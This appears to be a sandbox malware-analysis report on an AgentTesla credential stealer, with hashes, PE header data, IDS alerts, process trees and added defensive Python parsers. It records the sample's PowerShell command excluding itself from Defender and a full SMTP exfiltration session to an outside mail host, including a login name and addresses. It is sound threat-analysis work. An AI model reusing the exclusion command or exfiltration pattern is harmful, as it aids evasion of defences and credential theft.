                                          Process:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):26
                                          Entropy (8bit):3.95006375643621
                                          Encrypted:false
                                          SSDEEP:3:ggPYV:rPYV
                                          MD5:187F488E27DB4AF347237FE461A079AD
                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                          Malicious:true
                                          Preview:[ZoneTransfer]....ZoneId=0
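The 26-byte file above is a Zone.Identifier alternate data stream whose ZoneId is 0 (Local machine), which is what the "Hides that the sample has been downloaded from the Internet" signature refers to: a copy that carries ZoneId 0 instead of ZoneId 3 (Internet) never triggers the SmartScreen or attachment-manager prompt. The following is an added example, not code from Joe Sandbox or from the report, that parses such a stream and says what Windows will make of it. The two inputs are constructed: the first mirrors the dropped file (its preview shows the four non-printable bytes as dots), the second is a typical browser-written stream; `read_motw` assumes an NTFS path on Windows.

```python
from typing import Optional

# URLMON security zones as they appear in the ZoneId field of a Zone.Identifier stream.
ZONE_NAMES = {0: "Local machine", 1: "Local intranet", 2: "Trusted sites",
              3: "Internet", 4: "Restricted sites"}

# Constructed inputs: a stream like the one this sample drops, and a typical browser-written one.
SAMPLE_DROPPED = b"[ZoneTransfer]\r\n\r\nZoneId=0"
SAMPLE_BROWSER = (b"[ZoneTransfer]\r\nZoneId=3\r\n"
                  b"ReferrerUrl=https://example.invalid/\r\n"
                  b"HostUrl=https://example.invalid/quote.exe\r\n")


def parse_zone_identifier(raw: bytes) -> dict:
    """Parse the INI-style [ZoneTransfer] section (ZoneId, ReferrerUrl, HostUrl, ...)."""
    fields, in_section = {}, False
    for line in raw.decode("utf-8", errors="replace").splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line.lower() == "[zonetransfer]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            fields[key.strip()] = value.strip()
    return fields


def classify_motw(raw: Optional[bytes]) -> dict:
    """Say whether the stream marks the file as untrusted (zones 3 and 4 trigger the prompts)."""
    if raw is None:
        return {"zone_id": None, "zone_name": "no Zone.Identifier stream",
                "marked_from_internet": False, "host_url": None}
    fields = parse_zone_identifier(raw)
    try:
        zone_id = int(fields.get("ZoneId", ""))
    except ValueError:
        zone_id = None
    return {
        "zone_id": zone_id,
        "zone_name": ZONE_NAMES.get(zone_id, "unknown/absent zone"),
        "marked_from_internet": zone_id is not None and zone_id >= 3,
        "host_url": fields.get("HostUrl"),
    }


def read_motw(path: str) -> Optional[bytes]:
    """Read the alternate data stream of a file on NTFS (Windows only); None when absent."""
    try:
        with open(f"{path}:Zone.Identifier", "rb") as f:  # assumption: NTFS path on Windows
            return f.read()
    except OSError:
        return None


if __name__ == "__main__":
    for label, raw in (("dropped copy", SAMPLE_DROPPED), ("browser download", SAMPLE_BROWSER)):
        print(label, classify_motw(raw))
```

Run against a dropped payload on a real host, `classify_motw(read_motw(path))` returning `zone_id` 0 or no stream at all is the artefact to look for: a file that arrived by e-mail or browser should carry ZoneId 3 and a HostUrl.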
                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                          Entropy (8bit):7.817123931818624
                                          TrID:
                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                          • Windows Screen Saver (13104/52) 0.07%
                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                          File name:Eschemyquote24573j33.exe
                                          File size:669'696 bytes
                                          MD5:bdd152d62cf8fa852e08c46505629663
                                          SHA1:b1a0fd6a26c5bf9ba02c12afcdc89eeb8528040e
                                          SHA256:a2cdc2f4fcad4c6b982674a1b3b86a0f7bcdb7c8f18c1183799d70777c726859
                                          SHA512:d269318e997d36a40d5b9dfff0a2f2a40beb99d4103b5cc233483af14987e3fd167829435e0f176bb1371f86e1ed9f1f3cdeef080338448f5265eac77cbf29d4
                                          SSDEEP:12288:HzX8bQbtnLi/iVh9VmQ3DC8SlQ851wNXmPygPao9xDmCjc:0IR8iVhHmQ3OtlVFPHj
                                          TLSH:53E4022472AAD606D5C92BB50973D1F817B6ADD9E022D30B8FE67DEF3C3A7405842352
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....K...............0..............L... ...`....@.. ....................................@................................
                                          Icon Hash:00928e8e8686b000
                                          Entrypoint:0x4a4cd6
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0xDA4BC7FC [Sun Jan 20 21:11:24 2086 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the previous instruction repeats 96 more times: the bytes after the six-byte entry stub are zero padding, and 00 00 disassembles as add byte ptr [eax], al)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa4c81 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xa6000 | 0x5b4 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0xa3368 | 0x70 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa2cdc | 0xa2e00 | 3de32ca0fee023013c12bb43fbaee305 | False | 0.9267615598618573 | data | 7.8248096934652995 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xa6000 | 0x5b4 | 0x600 | 9891bc64fcdf52c22bfe4f853826d640 | False | 0.4231770833333333 | data | 4.099143665645962 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xa8000 | 0xc | 0x200 | c79a4a53e12cc62bf13fd126ee644310 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
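Several of the static fields above come straight out of the PE headers: the COFF TimeDateStamp 0xDA4BC7FC decodes to January 2086, which is why the report flags a suspicious time stamp; the entry stub `jmp dword ptr [00402000h]` is the standard unmanaged-to-CLR trampoline, and 0x402000 is exactly ImageBase (0x400000) plus the IAT directory RVA (0x2000); a non-empty IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR marks the file as a .NET assembly; and the 7.82 entropy of .text is what a packed or encrypted payload looks like. The following is an added example, not code from Joe Sandbox or from the report, that parses these headers and performs those checks. Because the sample itself is not on the page, it builds a constructed PE32 image that reuses the report's header values (time stamp, image base, IAT and CLR directory RVAs, the entry stub) with synthetic section bodies; the entropy values it prints are therefore those of the constructed sections, not the report's.

```python
import math
import struct
from datetime import datetime, timedelta, timezone

# PE32 optional header (96 bytes, then 16 data directories of 8 bytes) and 40-byte section header.
OPT_FMT = "<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6
SEC_FMT = "<8sIIIIIIHHI"
DIR_IAT, DIR_COM_DESCRIPTOR = 12, 14
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
ANALYSIS_TIME = datetime(2024, 9, 26, tzinfo=timezone.utc)  # date of this report


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 when all 256 byte values are equally frequent."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes, analysis_time: datetime) -> dict:
    """Read the COFF header, optional header, data directories and section table of a PE32 file."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    machine, nsec, ts, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    opt = struct.unpack_from(OPT_FMT, data, opt_off)
    entry_rva, image_base, ndirs = opt[6], opt[9], opt[29]
    dirs = [struct.unpack_from("<II", data, opt_off + 96 + 8 * i) for i in range(ndirs)]
    sec_off = opt_off + opt_size

    sections, stub_target = [], None
    for i in range(nsec):
        name, vsize, va, raw_size, raw_ptr, *_ = struct.unpack_from(SEC_FMT, data, sec_off + 40 * i)
        raw = data[raw_ptr:raw_ptr + raw_size]
        sections.append({"name": name.rstrip(b"\0").decode(), "va": va, "vsize": vsize,
                         "raw_size": raw_size, "entropy": shannon_entropy(raw)})
        if va <= entry_rva < va + raw_size:
            off = raw_ptr + entry_rva - va
            if data[off:off + 2] == b"\xff\x25":  # jmp dword ptr [imm32]: the usual .NET entry stub
                stub_target = struct.unpack_from("<I", data, off + 2)[0]

    ts_utc = EPOCH + timedelta(seconds=ts)
    return {
        "machine": machine,
        "timestamp_utc": ts_utc,
        "timestamp_in_future": ts_utc > analysis_time,
        "is_dotnet": dirs[DIR_COM_DESCRIPTOR] != (0, 0),
        "entrypoint_va": image_base + entry_rva,
        "entry_jumps_to_iat": stub_target is not None and stub_target == image_base + dirs[DIR_IAT][0],
        "sections": sections,
    }


def build_sample_pe() -> bytes:
    """Constructed PE32 image (not the report's sample) reusing its header values:
    TimeDateStamp 0xDA4BC7FC, ImageBase 0x400000, IAT at RVA 0x2000, CLR header at RVA 0x2008."""
    entry_rva, image_base, headers_size = 0x2100, 0x400000, 0x200
    text = bytearray(bytes(range(256)) * 8)                 # high-entropy body, like a packed .text
    text[0x100:0x106] = b"\xff\x25" + struct.pack("<I", image_base + 0x2000)  # jmp [0x402000]
    reloc = bytes(0x200)                                    # all zeros, like a near-empty .reloc
    sections = [(b".text", 0x2000, bytes(text), 0x60000020), (b".reloc", 0x4000, reloc, 0x42000040)]

    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)                 # e_lfanew
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0xDA4BC7FC, 0, 0, 224, 0x0102)
    opt = struct.pack(OPT_FMT, 0x10B, 48, 0, len(text), len(reloc), 0, entry_rva, 0x2000, 0x4000,
                      image_base, 0x1000, 0x200, 4, 0, 0, 0, 4, 0, 0, 0x6000, headers_size, 0, 2, 0x8540,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[DIR_IAT], dirs[DIR_COM_DESCRIPTOR] = (0x2000, 0x8), (0x2008, 0x48)
    dir_bytes = b"".join(struct.pack("<II", va, size) for va, size in dirs)
    sec_table, body, raw_ptr = b"", b"", headers_size
    for name, va, raw, chars in sections:
        sec_table += struct.pack(SEC_FMT, name.ljust(8, b"\0"), len(raw), va, len(raw), raw_ptr, 0, 0, 0, 0, chars)
        body += raw
        raw_ptr += len(raw)
    headers = (bytes(dos) + b"PE\0\0" + coff + opt + dir_bytes + sec_table).ljust(headers_size, b"\0")
    return headers + body


def analyze_sample() -> dict:
    return parse_pe(build_sample_pe(), ANALYSIS_TIME)


if __name__ == "__main__":
    info = analyze_sample()
    print("timestamp:", info["timestamp_utc"], "future:", info["timestamp_in_future"])
    print(".NET:", info["is_dotnet"], "entry:", hex(info["entrypoint_va"]), "jmp via IAT:", info["entry_jumps_to_iat"])
    for s in info["sections"]:
        print(f'{s["name"]:8} va=0x{s["va"]:x} raw=0x{s["raw_size"]:x} entropy={s["entropy"]:.2f}')
```

To run it on a real file, pass `open(path, "rb").read()` to `parse_pe` with the time of analysis. A time stamp later than that time cannot be a genuine link time, so it is worth treating as a tampering indicator in its own right, independent of the AV verdicts.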
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0xa6090 | 0x324 | data | | | 0.43532338308457713
RT_MANIFEST | 0xa63c4 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-26T09:06:54.339278+0200 | 2030171 | ET MALWARE AgentTesla Exfil Via SMTP | 1 | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
2024-09-26T09:06:54.339278+0200 | 2839723 | ETPRO MALWARE Win32/Agent Tesla SMTP Activity | 1 | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
2024-09-26T09:06:54.339278+0200 | 2840032 | ETPRO MALWARE Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2 | 1 | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
2024-09-26T09:08:24.118030+0200 | 2855542 | ETPRO MALWARE Agent Tesla CnC Exfil Activity | 1 | 192.168.2.5 | 49716 | 108.167.140.123 | 587 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 09:08:22.437994003 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:22.443030119 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:22.443165064 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.087785006 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.088844061 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.093969107 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.243592024 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.283674955 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.288625002 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.438431025 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.439376116 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.444401026 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.607510090 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.607770920 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.614272118 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.763698101 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.763894081 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.768685102 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.962562084 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:23.962747097 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:23.967611074 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.117338896 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.117976904 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:24.118030071 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:24.118051052 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:24.118074894 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:08:24.122972965 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.122986078 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.122993946 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.123003006 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.278291941 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:08:24.323671103 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:10:02.105530024 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:10:02.110673904 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:10:02.466172934 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:10:02.466284037 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Sep 26, 2024 09:10:02.468127012 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:10:02.472532034 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123
Sep 26, 2024 09:10:02.478195906 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 26, 2024 09:08:22.089580059 CEST | 63169 | 53 | 192.168.2.5 | 1.1.1.1
Sep 26, 2024 09:08:22.423558950 CEST | 53 | 63169 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Sep 26, 2024 09:08:22.089580059 CEST | 192.168.2.5 | 1.1.1.1 | 0x4cb3 | Standard query (0) | mail.musabody.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Sep 26, 2024 09:08:22.423558950 CEST | 1.1.1.1 | 192.168.2.5 | 0x4cb3 | No error (0) | mail.musabody.com | | 108.167.140.123 | A (IP address) | IN (0x0001) | false
Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
Sep 26, 2024 09:08:23.087785006 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 220-gator4156.hostgator.com ESMTP Exim 4.96.2 #2 Thu, 26 Sep 2024 02:08:23 -0500
    220-We do not authorize the use of this system to transport unsolicited,
    220 and/or bulk e-mail.
Sep 26, 2024 09:08:23.088844061 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | EHLO 134349
Sep 26, 2024 09:08:23.243592024 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 250-gator4156.hostgator.com Hello 134349 [8.46.123.33]
    250-SIZE 52428800
    250-8BITMIME
    250-PIPELINING
    250-PIPECONNECT
    250-AUTH PLAIN LOGIN
    250-STARTTLS
    250 HELP
Sep 26, 2024 09:08:23.283674955 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | AUTH login dmljdG9yaWFAbXVzYWJvZHkuY29t
Sep 26, 2024 09:08:23.438431025 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 334 UGFzc3dvcmQ6
Sep 26, 2024 09:08:23.607510090 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 235 Authentication succeeded
Sep 26, 2024 09:08:23.607770920 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | MAIL FROM:<victoria@musabody.com>
Sep 26, 2024 09:08:23.763698101 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 250 OK
Sep 26, 2024 09:08:23.763894081 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | RCPT TO:<pritchardchristopher281@gmail.com>
Sep 26, 2024 09:08:23.962562084 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 250 Accepted
Sep 26, 2024 09:08:23.962747097 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | DATA
Sep 26, 2024 09:08:24.117338896 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 354 Enter message, ending with "." on a line by itself
Sep 26, 2024 09:08:24.118074894 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | .
Sep 26, 2024 09:08:24.278291941 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 250 OK id=1stibw-003smC-07
Sep 26, 2024 09:10:02.105530024 CEST | 49716 | 587 | 192.168.2.5 | 108.167.140.123 | QUIT
Sep 26, 2024 09:10:02.466172934 CEST | 587 | 49716 | 108.167.140.123 | 192.168.2.5 | 221 gator4156.hostgator.com closing connection

                                          Target ID:0
                                          Start time:03:06:56
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                                          Imagebase:0x490000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.2069428436.0000000003909000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:3
                                          Start time:03:06:57
                                          Start date:26/09/2024
                                          Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                                          Imagebase:0x9c0000
                                          File size:433'152 bytes
                                          MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:4
                                          Start time:03:06:57
                                          Start date:26/09/2024
                                          Path:C:\Users\user\Desktop\Eschemyquote24573j33.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\Eschemyquote24573j33.exe"
                                          Imagebase:0xfa0000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4509927352.0000000003311000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                          Target ID:5
                                          Start time:03:06:57
                                          Start date:26/09/2024
                                          Path:C:\Windows\System32\conhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                          Imagebase:0x7ff6d64d0000
                                          File size:862'208 bytes
                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:6
                                          Start time:03:07:00
                                          Start date:26/09/2024
                                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                          Imagebase:0x7ff6ef0c0000
                                          File size:496'640 bytes
                                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Target ID:7
                                          Start time:03:07:09
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0x850000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 58%, ReversingLabs
                                          Reputation:low
                                          Has exited:true

                                          Target ID:8
                                          Start time:03:07:10
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xf90000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.2255456964.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.2259031078.0000000003391000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:10
                                          Start time:03:07:17
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xa80000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2283120210.0000000004071000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2283120210.0000000003F0D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:true

                                          Target ID:11
                                          Start time:03:07:18
                                          Start date:26/09/2024
                                          Path:C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\AppData\Roaming\ctsdvwT\ctsdvwT.exe"
                                          Imagebase:0xe30000
                                          File size:669'696 bytes
                                          MD5 hash:BDD152D62CF8FA852E08C46505629663
                                          Has elevated privileges:false
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.4509557072.000000000319B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          Reputation:low
                                          Has exited:false

                                            Execution Graph

                                            Execution Coverage:10.6%
                                            Dynamic/Decrypted Code Coverage:100%
                                            Signature Coverage:0%
                                            Total number of Nodes:242
                                            Total number of Limit Nodes:12
